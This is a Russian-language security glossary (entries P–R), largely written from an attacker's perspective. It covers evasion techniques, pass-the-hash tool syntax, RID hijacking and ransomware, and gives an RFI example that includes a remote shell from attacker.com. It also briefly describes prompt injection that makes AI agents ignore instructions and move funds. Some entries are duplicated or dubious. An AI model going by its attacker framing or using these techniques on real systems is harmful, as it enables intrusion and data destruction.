Privileged Access Workstation (PAW) Выделенная рабочая станция для администраторов с повышенными требованиями безопасности. Для атакующего PAW препятствие: даже скомпрометировав учетную запись администратора, может не быть возможности использовать ее с PAW.

PRNG (Pseudo-Random Number Generator) Генератор псевдослучайных чисел. Слабый PRNG может привести к предсказуемым ключам, nonce, что используется в атаках (nonce reuse в ECDSA). В малвари PRNG используется для DGA, генерации ключей.

ProcDump Утилита Microsoft (Sysinternals) для создания дампов процессов. ProcDump используется атакующими для дампа LSASS. Может детектироваться EDR.

Process Процесс (запущенная программа). Для атакующего процессы контекст выполнения. Process injection внедрение кода в процесс.

Process Doppelgnging Техника execution evasion, использующая Windows Transactional NTFS (TxF). Создается транзакция, модифицируется файл, затем процесс создается из измененного файла. Обходит детекты, основанные на мониторинге создания процессов.

Process Hollowing Техника, при которой атакующий создает легитимный процесс в приостановленном состоянии, затем заменяет его код на вредоносный. Используется для сокрытия активности (код выполняется в легитимном процессе). Обходит детекты, основанные на создании новых процессов.

Process Injection Внедрение кода в другой процесс. Методы: CreateRemoteThread, APC injection, reflective DLL injection. Используется для сокрытия активности и обхода firewall.

Process Tree Дерево процессов (родитель-потомок). EDR анализирует process tree для обнаружения аномалий (например, Microsoft Word запускает PowerShell). Process injection и process hollowing нарушают process tree.

Process Whitelisting Белые списки процессов (AppLocker, WDAC). Обход: использование процессов, входящих в белый список (LOLBins), DLL sideloading.

Procmail Утилита для обработки email (фильтрации, сортировки) в Unix. Procmail может быть использован для: автоматической фильтрации фишинговых писем, создания правил для перенаправления почты. В контексте атак Procmail может быть целью для компрометации (изменение правил для перенаправления почты атакующему). Однако это устаревшая утилита, замененная более современными средствами.

ProcMon (Process Monitor) Утилита Sysinternals для мониторинга процессов, файловой системы, реестра. ProcMon используется для анализа поведения малвари.

Proctoring Системы прокторинга (удаленного наблюдения) для онлайн-экзаменов. В контексте атак прокторинг может быть целью для: взлома камеры, подмены личности (deepfake), обхода контроля. Однако это узкая область, не ключевая для общего хакерского словаря.

Profiling (Victim) Профилирование жертвы: сбор информации о цели (должность, доступы, привычки) для таргетированной атаки. Используется в spear-phishing, vishing.

Program (Malware) Программа (малварь).

Program Counter (PC) Счетчик команд. В эксплойтах перезапись PC цель.

Programming Language Язык программирования. Выбор языка для малвари влияет на детектируемость.

Project (The Com) Project Compass операция Europol против The Com.

Project Compass Операция Europol (январь 2025 март 2026), в результате которой арестованы 30 членов The Com в 28 странах. 179 дополнительных лиц идентифицированы, 62 жертвы частично идентифицированы. The Com включает Hacker Com, IRL Com, (S)extortion Com.

Project Management Управление проектами. Jira цель для кражи данных.

Prometheus Система мониторинга (Prometheus, Grafana). Для атакующего Prometheus цель: кража метрик, конфигураций, API-ключей.

Promiscuous Mode Режим сетевого интерфейса, принимающий все пакеты (не только предназначенные для него). Используется для перехвата трафика (sniffing).

Prompt Engineering Искусство составления промптов для LLM. Для атакующего prompt engineering используется для: генерации фишинга, написания кода малвари, обхода guardrails (jailbreak). Slopoly результат prompt engineering.

Prompt Injection Внедрение инструкций в LLM (Large Language Model) через пользовательский ввод, заставляющее модель игнорировать предыдущие инструкции и выполнять вредоносные действия. Используется в AILM (AI-Induced Lateral Movement) для заставления AI-агента выполнять команды (перевод средств, чтение данных). Prompt injection основная атака на AI-агентов в 2026.

Proof of Concept (PoC) Доказательство концепции (Proof of Concept) эксплойт или код, демонстрирующий существование уязвимости. PoC может быть: фрагментом кода (Python, C, Ruby), командой (curl), метасплойт-модулем. Для атакующего PoC основа для разработки эксплойта. После публикации PoC уязвимость становится 1-day (патч уже есть, но не везде установлен). PoC публикуются на Exploit-DB, GitHub, в блогах исследователей. Для защитников PoC инструмент для проверки наличия уязвимости в своих системах.

Proof of Work (PoW) Доказательство работы (консенсус в блокчейне, Bitcoin). В атаках Proof of Work используется для: защиты от DDoS (клиент должен решить задачу), предотвращения спама.

Proof Sample Доказательство (sample данных), публикуемое атакующими для подтверждения утечки. ShinyHunters публикует proof samples на Limewire для давления на жертву.

Propagation Распространение (червя). Worm распространяется самостоятельно через уязвимости, email, USB.

Proportional (Rate Limiting) Ограничение скорости. Для обхода атакующие используют slow & low, распределенные атаки.

Proprietary Software Проприетарное ПО. Атаки на проприетарное ПО требуют reverse engineering.

Protected Process Light (PPL) Защищенный процесс (Protected Process Light) в Windows. PPL блокирует открытие процесса для чтения/записи (LSASS в PPL защищен). Обход PPL: через kernel exploit, BYOVD, или использование уязвимости в самом PPL. Для атакующего PPL препятствие для дампа LSASS.

Protection Защита.

Protocol Протокол (TCP, HTTP, DNS, Modbus). Понимание протоколов помогает в разработке эксплойтов, C2.

Provenance Происхождение данных (в forensics). Для атакующего важно уничтожать provenance.

Proxifier Инструмент для проксирования трафика приложений. Используется атакующими для: обхода геоблокировок, скрытия C2.

Proxy Прокси-сервер. Используется для: сокрытия IP, обхода блокировок, C2 (reverse proxy). Типы: HTTP, SOCKS, transparent, forward, reverse.

ProxyChains Инструмент для маршрутизации трафика через цепочку прокси. Используется для анонимизации.

ProxyLogon Уязвимость Microsoft Exchange (CVE-2021-26855, 2021). ProxyLogon позволяла RCE без аутентификации. В 2026 все еще актуальна для непропатченных систем.

ProxyShell Уязвимости Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). ProxyShell позволяла RCE без аутентификации.

ProxyToken Уязвимость Microsoft Exchange (CVE-2021-33766), позволяющая подменять токены.

Pseudo-Random Number Generator (PRNG) Генератор псевдослучайных чисел (PRNG). Слабый PRNG может привести к предсказуемым ключам, nonce, что используется в атаках (nonce reuse в ECDSA). В малвари PRNG используется для DGA, генерации ключей, рандомизации задержек.

PsExec Утилита Sysinternals для удаленного выполнения команд (через SMB). PsExec используется для lateral movement. Антивирусы детектят PsExec, поэтому атакующие используют кастомные версии или Impacket.

PSK (Pre-Shared Key) Предварительно разделенный ключ (Wi-Fi, VPN). Слабый PSK может быть взломан брутфорсом. PSK также используется в некоторых C2.

PSP (Platform Security Processor) Процессор безопасности AMD (аналог Intel ME). Уязвимости PSP могут дать kernel access.

PTH (Pass-the-Hash) Техника аутентификации с использованием NTLM-хэша вместо пароля (Pass-the-Hash). Атакующий извлекает NTLM-хэш (через Mimikatz, дамп LSASS) и использует его для входа на другие системы (через SMB, RDP, WMI). Pass-the-Hash не требует знания plaintext пароля. Инструменты: Mimikatz (sekurlsa::pth), Impacket (psexec.py -hashes).

PTP (Precision Time Protocol) Протокол точного времени. Атаки на PTP могут нарушить синхронизацию в промышленных системах.

PTT (Pass-the-Ticket) Техника аутентификации с использованием Kerberos-билетов (Pass-the-Ticket). Атакующий извлекает TGT или service ticket (через Mimikatz) и использует его для доступа к ресурсам. Pass-the-Ticket может быть использован для lateral movement без знания пароля. Pass-the-Ticket не требует пароля, только билеты.

Public Key Публичный ключ (RSA, EC). Публичный ключ используется для шифрования, проверки подписи. Не является секретом, но его замена может привести к MITM.

Public Key Infrastructure (PKI) Инфраструктура открытых ключей (Public Key Infrastructure) система управления сертификатами, удостоверяющими центрами (CA), CRL. PKI используется для TLS, подписи кода, аутентификации. Компрометация PKI (например, кража корневого ключа CA) позволяет подписывать любые сертификаты (malware с доверенной подписью). Для атакующего PKI цель: кража приватных ключей CA.

Publish-Subscribe (Pub/Sub) Модель обмена сообщениями. Используется в C2 (Redis Pub/Sub, MQTT). Трафик Pub/Sub может выглядеть как легитимный.

PUP (Potentially Unwanted Program) Потенциально нежелательная программа (adware, тулбары). PUPs часто распространяются вместе с легитимным ПО. Могут использоваться как dropper.

Puppet Инструмент управления конфигурациями. Puppet может быть использован для: развертывания малвари, отключения защит, если скомпрометированы учетные записи.

Puppy (Rubber) Rubber Ducky (Bad USB).

Purple Team Команда, объединяющая Red Team (атака) и Blue Team (защита) для совместного улучшения безопасности. Для атакующего purple team означает, что защитники быстрее учатся.

Push (MFA) Push-уведомление для подтверждения входа (Microsoft Authenticator, Duo). Push MFA уязвим к: MFA fatigue (многократные push), vishing (убедить нажать Approve). AiTM может перехватывать push.

Push Notification Push-уведомление. Используется для C2 (FCM Firebase Cloud Messaging) уведомления выглядят легитимными, проходят через firewalls.

Pwning Сленг: взлом, получение контроля. От "owning".

PyInstaller Инструмент для упаковки Python-скриптов в исполняемые файлы (.exe). Используется для распространения Python-малвари.

PyPI (Python Package Index) Репозиторий Python-пакетов. Supply chain атаки через PyPI: typosquatting, компрометация пакетов.

Python Язык программирования. Используется для: написания малвари (инфостилеры, бэкдоры), C2 (PoshC2), инструментов (Impacket), автоматизации. Python-малварь требует интерпретатора, но может быть скомпилирована в .exe (PyInstaller).

PyTorch Фреймворк для машинного обучения. Для атакующего PyTorch инструмент для создания deepfake, adversarial AI.

Q

QEMU (Quick Emulator) Эмулятор и виртуализатор с открытым кодом. QEMU используется для: запуска виртуальных машин, эмуляции различных архитектур (ARM, MIPS) для анализа малвари, создания sandbox. Для атакующего QEMU может быть использован для: эмуляции среды жертвы при разработке эксплойтов, запуска вредоносных образов в изоляции (чтобы не заразить хост). Уязвимости QEMU (например, escape из гостевой системы) могут быть использованы для атак на хостовую систему.

Qilin RaaS (Ransomware-as-a-Service) группа, использующая малварь на Rust. Qilin специализируется на атаках на Windows и VMware ESXi, практикует двойной шантаж (шифрование + кража данных). В феврале 2026 Qilin атаковала IGT (International Game Technology), поставщика казино Лас-Вегаса, опубликовав 10GB данных (21,000+ файлов), включая схемы слот-машин и архитектуру казино. Qilin пример эволюции RaaS: Rust-малварь сложнее анализировать, чем C/C++.

QoS (Quality of Service) Качество обслуживания в сетях. В атаках QoS может быть использован для: приоритизации вредоносного трафика, DoS (истощение QoS-ресурсов). Для обхода QoS атакующие используют легитимные порты (443) и протоколы.

QR Code Двумерный штрихкод. QR-коды используются в: quishing (QR-фишинг), доставке малвари (ссылка в QR-коде), обходе email-фильтров (текст не содержит ссылки). Quishing растущий вектор в 2026: жертва сканирует QR-код, переходит на фишинговый сайт или скачивает малварь.

QRL (Quantum Resistant Ledger) Блокчейн, устойчивый к квантовым атакам. Для атакующего QRL интересен как пример пост-квантовой криптографии.

Qualys Вендор сканеров уязвимостей (QualysGuard). Qualys используется защитниками для аудита. Для атакующего знание Qualys помогает понять, какие уязвимости будут обнаружены, и обходить их.

Quantum Computing Квантовые вычисления. Квантовые компьютеры могут взломать RSA и ECC (алгоритм Шора). В 2026 квантовые компьютеры все еще не массовы, но пост-квантовая криптография внедряется. Для атакующего quantum computing будущая угроза для шифрования, но пока не актуальна.

Quantum Key Distribution (QKD) Квантовое распределение ключей. QKD теоретически невзламываемо. В 2026 QKD используется в отдельных государственных проектах.

Quarantine Карантин (антивирусный). Малварь в карантине изолирована. Для атакующего карантин препятствие: нужно избегать детекции, чтобы не попасть в карантин.

Quarantine (Network) Карантин сети (NAC). Устройство, не соответствующее политикам, помещается в карантинную сеть. Для атакующего карантин препятствие: нужно соответствовать политикам.

Quarter Квартал (финансовый, календарный) период в три месяца. В контексте атак может использоваться для: планирования атак (отчетные периоды, когда компании больше платят выкупы), анализа финансовых отчетов (SEC filings). Не является хакерским термином.

Quasar RAT Open-source RAT (Remote Administration Tool) на C#. Quasar позволяет удаленное управление, кражу данных, запись экрана. Используется атакующими как альтернатива коммерческим RAT.

Qubes См. Qubes OS. Qubes OS операционная система, построенная на изолированных виртуальных машинах (квотах). Каждое приложение (браузер, почта, офис) работает в отдельной VM, что ограничивает распространение атаки. Для атакующего Qubes препятствие: компрометация одной VM не дает доступа к другим. Qubes использует Xen hypervisor.

Qubes OS Операционная система, построенная на изолированных виртуальных машинах (квотах). Qubes используется для повышения безопасности: каждое приложение в отдельной VM. Для атакующего Qubes препятствие: компрометация одной VM не дает доступа к другим.

Qubes Whonix Сочетание Qubes OS и Whonix (Tor) для максимальной анонимности. Whonix изолирует Tor в отдельной VM. Используется для: C2, darknet-коммуникаций.

Query (DNS) DNS-запрос. DNS-запросы используются в: DNS-туннелях, DGA, эксфильтрации. Мониторинг DNS-запросов способ обнаружения C2.

Query (KQL) Kusto Query Language (используется в Azure Sentinel). Для атакующего понимание KQL помогает понять, какие запросы используют защитники.

Query (LDAP) Запрос к LDAP (Active Directory). LDAP injection внедрение в запрос. Для атакующего LDAP query способ перечислить пользователей, группы.

Query (SQL) Запрос к базе данных. SQL injection внедрение злонамеренного запроса. Для атакующего query инструмент для кражи данных.

Queue (Message) Очередь сообщений (MSMQ, RabbitMQ, Kafka). Очереди используются в C2: агенты подписываются на очередь, C2 публикует команды. Трафик очередей может быть легитимным.

Queue (MSMQ) Очередь сообщений Microsoft. MSMQ может быть использован для: C2 (межпроцессное взаимодействие), persistence (очередь сохраняется между перезагрузками). Уязвимости MSMQ: RCE (CVE-2023-21554).

Queue (Redis) Очередь Redis. Redis используется для: C2 (pub/sub), кэширования. Redis часто не защищен паролем, что приводит к компрометации.

Quick Assist Встроенный инструмент Windows для удаленной помощи. Quick Assist может быть использован атакующими для: удаленного доступа после vishing (убедить жертву открыть Quick Assist), persistence. Аналогично RMM-инструментам.

Quick Response (QR) Code QR-код двумерный штрихкод, используемый для быстрого перехода по ссылкам, оплаты, авторизации. В атаках QR-код используется в quishing (QR-фишинг): жертва сканирует QR-код, переходит на фишинговый сайт или скачивает малварь. Quishing обходит email-фильтры, так как ссылка не отображается в тексте.

QuickTime Мультимедийный фреймворк Apple. Уязвимости QuickTime (CVE-2016-4630) использовались для drive-by download. В 2026 QuickTime устарел.

Quid Pro Quo Социальная инженерия: предложение услуги в обмен на информацию. Пример: звонок "я из техподдержки, помогу вам, но нужно ваше имя пользователя". Используется в vishing.

Quine (Malware) Малварь, которая воспроизводит свой собственный код (самовоспроизведение). Quine используется в червях (worms) для распространения.

Quishing QR-фишинг: атака, использующая QR-коды для перенаправления жертвы на фишинговый сайт или скачивания малвари. Quishing обходит email-фильтры, так как ссылка не отображается в тексте письма. QR-коды размещаются в письмах, на фальшивых парковочных талонах, наклейках. В 2026 quishing становится популярным вектором.

Quota (Disk) Квота на дисковое пространство. В атаках квоты могут быть использованы для: DoS (заполнение диска), обнаружения (аномальное использование).

Quota (Network) Квота на сетевой трафик. В атаках: исчерпание квоты (DoS), обход (использование неучтенных каналов).

Quoting (SQL) Экранирование кавычек в SQL-запросах. Неправильное экранирование приводит к SQL injection. Атакующие используют обход кавычек (конкатенация, hex, union).

QWORD 64-битное слово (в программировании). В эксплойтах QWORD используется для записи адресов.

QWORD PTR Указатель на QWORD в ассемблере. Используется в shellcode для обращения к памяти.

QZ (Quantum Zone) Квантовая зона (Quantum Zone) термин из области квантовых вычислений. В контексте атак может относиться к пост-квантовой криптографии (PQC Post-Quantum Cryptography) или квантовым атакам (алгоритм Шора для взлома RSA). Не является стандартным термином.

R

RaaS (Ransomware-as-a-Service) Модель распространения ransomware, при которой разработчики создают шифровальщик и панель управления, а аффилиаты (партнеры) находят жертв, проводят атаки и получают 7080% выкупа. RaaS снижает барьер входа: не нужно уметь программировать, достаточно купить доступ. Примеры: BlackCat (ALPHV), Qilin, Zollo. В 2026 RaaS доминирующая модель в ransomware-экосистеме.

RAID (Redundant Array of Independent Disks) Массив дисков для повышения отказоустойчивости или производительности. Для атакующего RAID важен: уничтожение данных может потребовать уничтожения всех дисков массива, а не одного. В атаках на хранилища целесообразно атаковать контроллер RAID или уничтожать диски физически.

Rainbow Table Предвычисленная таблица хэшей для ускорения взлома паролей. Rainbow table содержит хэши для всех возможных паролей до определенной длины. Используется против простых хэшей (LM, MD5) без соли (salt). В 2026 соль (salt) используется в большинстве систем, что делает rainbow tables неэффективными.

RAM (Random Access Memory) Оперативная память. Для атакующего RAM источник: паролей в открытом виде (LSASS), ключей шифрования, сессионных токенов, содержимого процессов. Memory dumping (cold boot attack, ProcDump) способ извлечения данных из RAM.

RAM Scraper Программа для извлечения данных из оперативной памяти (например, паролей из POS-терминалов). RAM scraper используется в атаках на POS-системы для кражи данных карт (магнитная полоса).

Ransom Note Записка с требованиями выкупа, оставляемая после шифрования. Ransom note содержит: инструкции по оплате (Bitcoin, Monero), адрес кошелька, сроки, угрозы публикации данных (double extortion). Interlock и ShinyHunters используют ransom notes с угрозами утечки.

Ransomware Вредоносное ПО, шифрующее файлы жертвы и требующее выкуп за расшифровку. Типы: crypto-ransomware (шифрует файлы), locker-ransomware (блокирует экран), wiper (уничтожает данные, маскируясь под ransomware). В 2026 доминирует double extortion (шифрование + кража данных). Примеры: Qilin, Zollo, BlackCat.

Ransomware Gang Группа, занимающаяся ransomware-атаками. Структура: разработчики (создают шифровальщик, панель), аффилиаты (проводят атаки), брокеры доступа (IAB), переговорщики (общаются с жертвами). Примеры: Conti (распалась), LockBit (disrupted), BlackCat, Qilin.

Ransomware Negotiation Переговоры с атакующими о сумме выкупа. Специализированные компании (Coveware, Palo Alto Unit 42) ведут переговоры от лица жертв. Для атакующего negotiation этап, где нужно определить максимальную сумму, которую жертва готова заплатить, и не потерять сделку.

Ransomware-as-a-Service (RaaS) Модель распространения ransomware, при которой разработчики создают шифровальщик и панель управления, а аффилиаты (партнеры) находят жертв, проводят атаки и получают 7080% выкупа. RaaS снижает барьер входа: не нужно уметь программировать, достаточно купить доступ. Примеры: BlackCat (ALPHV), Qilin, Zollo, LockBit.

RAT (Remote Administration Tool) Программа для удаленного управления (Remote Administration Tool). Легитимные RAT (AnyDesk, TeamViewer) используются администраторами, а злоумышленники используют вредоносные RAT (Quasar, DarkComet, NjRAT) для: удаленного управления, кражи данных, записи экрана, кейлогинга. RAT часто маскируются под легитимный софт. The Com использует легитимные RMM (Remote Monitoring and Management) для persistence после vishing.

Rate Limiting Ограничение скорости запросов для защиты от брутфорса, DDoS. Для атакующего rate limiting препятствие: нужно использовать распределенные атаки, slow & low, или обходить через использование разных IP (прокси, ботнет).

Raw Socket Сокет, позволяющий отправлять необработанные пакеты (raw packets). Raw socket используется для: IP spoofing, SYN flood, создания кастомных пакетов. В современных ОС создание raw socket требует прав администратора.

RCE (Remote Code Execution) Удаленное выполнение кода: уязвимость, позволяющая атакующему выполнить произвольный код на удаленной системе без предварительного доступа. RCE самая критичная уязвимость. Примеры: CVE-2026-20131 (Cisco FMC), CVE-2026-20963 (SharePoint). RCE дает initial access.

RDP (Remote Desktop Protocol) Протокол удаленного рабочего стола Microsoft (порт 3389). RDP распространенный вектор initial access: брутфорс паролей, покупка доступа у IAB, уязвимости (BlueKeep, CVE-2019-0708). RDP используется для lateral movement. В 2026 рекомендуется использовать RDP с NLA (Network Level Authentication) и MFA.

RDP Abuse Злоупотребление RDP: брутфорс, использование украденных учетных записей, эксплуатация уязвимостей. RDP доступы продаются на даркнете ($10100 за доступ). IAB специализируются на RDP-доступах.

RDP Hijacking Захват существующей RDP-сессии другого пользователя. Техника: с помощью tscon.exe, qwinsta, или кражи токенов. Позволяет войти в сессию, где пользователь уже прошел MFA.

Re-Entrancy (Reentrancy) Уязвимость смарт-контрактов, при которой внешний вызов контракта может произойти до обновления состояния, позволяя повторно войти в функцию и вывести средства несколько раз. Классическая атака The DAO (2016). В 2026 reentrancy все еще встречается в новых DeFi-протоколах.

Re-Entrancy Attack Атака на смарт-контракт с использованием reentrancy. Атакующий вызывает функцию, которая делает внешний вызов (например, transfer), и до обновления баланса снова вызывает ту же функцию. Используется для кражи средств из контракта.

Reachable (CVE) Уязвимость, которая достижима в контексте приложения. Для атакующего важно, что не все CVE достижимы в конкретной конфигурации. При поиске целей атакующий ищет достижимые уязвимости.

Reaction (IR) Реагирование на инциденты. Скорость реакции защитников определяет успех атаки.

Read (Access) Право на чтение. Для атакующего чтение данных цель эксфильтрации.

Read-Only Только для чтения. В атаках read-only доступ может быть использован для кражи данных, но не для модификации.

Real ID Федеральный стандарт удостоверений личности в США (REAL ID). Deepfake KYC использует шаблоны REAL ID для создания поддельных документов.

Real-Time (Monitoring) Мониторинг в реальном времени. Для атакующего real-time monitoring означает, что защитники могут отреагировать быстро. Нужно действовать так, чтобы не триггерить мгновенные алерты.

Realm (Kerberos) Область Kerberos (обычно домен AD в верхнем регистре, CONTOSO.COM). При создании Golden Ticket нужно указать правильный realm.

Reboot Перезагрузка. Некоторые малвари не имеют persistence и удаляются после перезагрузки. Для атакующего reboot угроза потерять доступ, поэтому нужен persistence.

Recon (Reconnaissance) Разведка: сбор информации о цели. Этапы: OSINT (открытые источники), сканирование сети (nmap), поиск уязвимостей. Recon первый этап kill chain.

Reconnaissance См. Recon. Reconnaissance (разведка) сбор информации о цели. Этапы: OSINT (открытые источники), сканирование сети (nmap), поиск уязвимостей, социальная инженерия. Recon первый этап kill chain.

Record (DNS) DNS-запись (A, AAAA, MX, TXT, CNAME). DNS-записи используются в OSINT, subdomain enumeration, DNS-туннелях.

Recovery (Data) Восстановление данных после атаки. Для атакующего уничтожение бэкапов приоритет, чтобы prevent recovery.

Recovery (Key) Ключ восстановления (BitLocker, FileVault). Recovery key используется для расшифровки диска, если забыт пароль. Для атакующего кража recovery key (из AD, Microsoft Account, распечатки) дает доступ к зашифрованному диску.

Recursive (DNS) Рекурсивный DNS-сервер. Используется в DNS amplification DDoS.

Red Team Команда, имитирующая атакующих для тестирования защиты. Red Team использует те же TTPs, что и реальные атакующие. Для атакующего red team source TTPs, которые детектятся, и нужно отличаться.

Redirect (HTTP) HTTP-редирект (3xx). Используется в фишинге: перенаправление с фишингового сайта на легитимный после сбора данных, чтобы жертва не заметила. Используется в C2: редирект на другой домен.

Redirection (Network) Перенаправление трафика (NAT, DNAT, порт-форвардинг). Используется для сокрытия C2.

RedLine Инфостилер, популярный в 2026. RedLine крадет пароли из браузеров, cookies, крипто-кошельки, файлы, делает скриншоты, кейлог. Распространяется через malvertising, crack-сайты. Имеет панель управления (C2). Конкурирует с LummaC2, Stealc.

Refactor (Code) Рефакторинг кода. Для атакующего рефакторинг малвари способ изменить сигнатуры.

Reflection (C#) Механизм .NET для получения информации о типах и вызова методов во время выполнения. Reflection используется в .NET-малвари для: динамической загрузки модулей, вызовов без статических импортов, обхода детектов.

Reflective DLL Injection Техника внедрения DLL без вызова LoadLibrary (который детектируется). DLL загружается в память процесса, затем выполняется ее код. Используется в Cobalt Strike, Metasploit.

Refresh Token (OAuth) Токен обновления в OAuth, используемый для получения нового access token после истечения старого. Refresh token живет дольше (дни, недели). Для атакующего кража refresh token дает долгосрочный доступ.

Registry (Windows) Реестр Windows. Используется для: persistence (run keys, services), конфигурации (отключение Defender), хранения данных (LSA Secrets). Для атакующего работа с реестром часть post-exploitation.

Registry Run Key Ключ реестра, запускающий программы при входе пользователя: HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Используется для persistence.

Registry Service Key Ключ реестра для служб: HKLM\SYSTEM\CurrentControlSet\Services. Добавление службы persistence.

Reinfection Повторное заражение после очистки. Для атакующего reinfection способ вернуть доступ, если persistence обнаружен.

Reject (DMARC) Политика DMARC "reject" отклонять письма, не прошедшие аутентификацию. Для атакующего reject препятствие для фишинга с поддельного домена.

Relay (MFA) MFA relay: перехват MFA-сессии (AiTM) для обхода MFA.

Relay (NTLM) NTLM relay: перехват NTLM-аутентификации и ее ретрансляция на другой сервер. Используется для lateral movement, повышения привилегий. Инструменты: responder, ntlmrelayx.

Reliability Надежность. В атаках reliable exploit эксплойт, который стабильно работает.

Remediation Устранение последствий атаки (восстановление, закрытие уязвимостей). Для атакующего remediation конец доступа.

Remote Access Trojan (RAT) Вредоносная программа для удаленного управления (Remote Access Trojan). RAT позволяет атакующему: выполнять команды на зараженной системе, просматривать файлы, записывать экран (screen capture), вести кейлог (keylogging), управлять веб-камерой и микрофоном, скачивать и загружать файлы, использовать зараженную систему как прокси. Легитимные RAT используются администраторами для удаленной поддержки (AnyDesk, TeamViewer), вредоносные RAT маскируются под легитимный софт. Примеры вредоносных RAT: Quasar, DarkComet, NjRAT, Orcus, NanoCore. RAT часто распространяются через фишинг, crack-сайты, эксплойты. The Com использует легитимные RMM (Remote Monitoring and Management) для persistence после vishing, что функционально аналогично RAT.

Remote Code Execution (RCE) Удаленное выполнение кода (Remote Code Execution) уязвимость, позволяющая атакующему выполнить произвольный код на удаленной системе без предварительного доступа. RCE самая критичная уязвимость. Примеры: CVE-2026-20131 (Cisco FMC), CVE-2026-20963 (SharePoint). RCE дает initial access.

Remote Desktop Protocol (RDP) Протокол удаленного рабочего стола Microsoft (Remote Desktop Protocol, порт 3389). RDP распространенный вектор initial access: брутфорс паролей, покупка доступа у IAB, уязвимости (BlueKeep, CVE-2019-0708). RDP используется для lateral movement. В 2026 рекомендуется использовать RDP с NLA (Network Level Authentication) и MFA.

Remote Monitoring and Management (RMM) Легитимные инструменты удаленного управления (AnyDesk, ScreenConnect, TeamViewer). The Com использует RMM для persistence после vishing.

Replication Репликация данных (бэкапы, распределенные базы). Для атакующего уничтожение реплик задача.

Repository (Git) Git-репозиторий. Supply chain атаки: компрометация репозитория, внедрение вредоносного кода.

Reseller (IAB) Реселлер (перепродавец) доступа (IAB). Покупает доступы у брокеров, перепродает аффилиатам.

Resilience Устойчивость к атакам (resilience) и устойчивость инфраструктуры атакующего к takedown. Handala продемонстрировала resilience: после seizure доменов ФБР, вернулась через 24 часа.

Resolution (DNS) Разрешение DNS-имени в IP. Используется в рекогносцировке.

Responder Инструмент для ответа на LLMNR, NBT-NS, MDNS запросы, перехвата NTLM-хэшей. Используется в локальных сетях для NTLM relay.

Response (HTTP) HTTP-ответ. В C2 ответы содержат команды.

Response (IR) Реагирование на инциденты. Скорость response определяет успех атаки.

Responsible Disclosure Ответственное раскрытие уязвимости: сообщение вендору до публикации. Для атакующего responsible disclosure источник информации о fresh 1-day (до публикации, но после исправления).

Rest API RESTful API. Для атакующего API цель: misconfig, IDOR, отсутствие rate limiting.

Restore (Backup) Восстановление из бэкапа. Для атакующего уничтожение бэкапов приоритет.

Resume (Session) Возобновление сессии. Session resumption (TLS session tickets) может быть использовано для обхода детектов.

Ret2dlresolve Техника exploitation, использующая динамическое разрешение символов в Linux для вызова функций без утечки адресов.

Ret2libc Техника эксплуатации buffer overflow, возвращающаяся в libc (стандартную библиотеку C) для выполнения системных вызовов (system("/bin/sh")). Обходит DEP (NX).

Ret2plt Возврат в PLT (Procedure Linkage Table) для вызова функций из библиотек.

Ret2syscall Возврат к системному вызову (syscall) для выполнения операций напрямую, минуя libc.

Ret2win Возврат на функцию "win" (например, print_flag) в CTF-задачах.

Retrieval (Data) Извлечение данных.

Retro Ретроспектива (в разработке ПО, agile) встреча команды для обсуждения прошедшего периода. В контексте атак retro может использоваться в кибербезопасности для анализа инцидентов (post-mortem). Не является хакерским термином.

Reverse Engineering Реверс-инжиниринг: анализ программного обеспечения для понимания его работы, поиска уязвимостей, извлечения алгоритмов. Инструменты: IDA Pro, Ghidra, Binary Ninja, x64dbg.

Reverse Proxy Обратный прокси, принимающий запросы от клиентов и перенаправляющий их на внутренние серверы. Reverse proxy используется для: сокрытия C2 (домен указывает на proxy, proxy на реальный C2), балансировки нагрузки, SSL termination.

Reverse Shell Оболочка, при которой атакующий слушает (listener), а жертва инициирует соединение. Reverse shell используется для обхода firewalls, блокирующих входящие соединения. Атакующий отправляет payload, который подключается к его серверу.

Reverse Tunnel Туннель, инициируемый из внутренней сети наружу. Используется для обхода firewalls.

Revocation (Certificate) Отзыв сертификата (CRL, OCSP). Для атакующего отзыв сертификата может сделать его недействительным.

Rewards for Justice Программа Госдепартамента США, предлагающая награду до $10 млн за информацию о хакерах, атакующих критическую инфраструктуру США. В марте 2026 награда была объявлена в связи с атаками Handala и Interlock.

RFI (Remote File Inclusion) Уязвимость, позволяющая включить удаленный файл в веб-приложение. Пример: include($_GET['page']) с параметром http://attacker.com/shell.php. RFI дает RCE.

RFID (Radio-Frequency Identification) Бесконтактная идентификация (пропуски, карты доступа). Атаки на RFID: клонирование (Proxmark3, Flipper Zero), relay (усиление сигнала), перехват. Используется в физическом пентесте.

RFID Cloning Клонирование RFID-карт. Устройства: Proxmark3, Flipper Zero, Chameleon Ultra. Клонирование возможно для карт без криптозащиты (MIFARE Classic) или с взломанной защитой.

RFID Relay Релейная атака: усиление сигнала RFID для открытия двери, когда карта находится далеко. Используется для tailgating.

RID (Relative Identifier) Идентификатор в Windows (часть SID). RID 500 администратор. RID hijacking изменение RID для создания скрытой учетной записи администратора.

RID Hijacking Техника создания скрытой учетной записи администратора в Windows путем изменения RID в реестре SAM на 500. Учетная запись выглядит как обычный пользователь, но имеет права администратора.

Rig (Exploit Kit) Exploit Kit, использовавшийся для drive-by download. В 2026 устарел.

RIP (Routing Information Protocol) Протокол маршрутизации. Уязвимости RIP могут привести к перенаправлению трафика.

Risk (Security) Риск безопасности. Для атакующего риск вероятность быть обнаруженным.

Risk Assessment Оценка рисков. Для атакующего низкий риск = легкая цель.

RLO (Right-to-Left Override) Символ Unicode (U+202E) для изменения порядка отображения текста. Используется в фишинге для создания файлов с поддельными расширениями (например, exe отображается как txt).

RMM (Remote Monitoring and Management) Легитимные инструменты удаленного управления (AnyDesk, ScreenConnect, TeamViewer, ConnectWise Control). The Com использует RMM для persistence: после vishing убеждают helpdesk установить RMM, затем используют его для доступа.

RNG (Random Number Generator) Генератор случайных чисел. Слабый RNG может привести к предсказуемым ключам. В малвари RNG используется для DGA.

ROA (Return on Assets) Рентабельность активов финансовый показатель, отношение чистой прибыли к стоимости активов. В контексте атак ROA может использоваться для оценки ущерба от атаки (снижение ROA). Не является хакерским термином.

Robustness Устойчивость. Robust malware малварь, устойчивая к анализу, детектам, перезагрузкам.

ROCA (Return of Coppersmith Attack) Уязвимость в генерации RSA-ключей (CVE-2017-15361). Используется для взлома слабых RSA-ключей.

RockYou Словарь паролей (rockyou.txt), содержащий 14 миллионов паролей, утекших в 2009. Используется в dictionary attack.

ROI (Return on Investment) Возврат инвестиций. Для атакующего ROI атаки выкуп / затраты. RaaS модели дают высокий ROI.

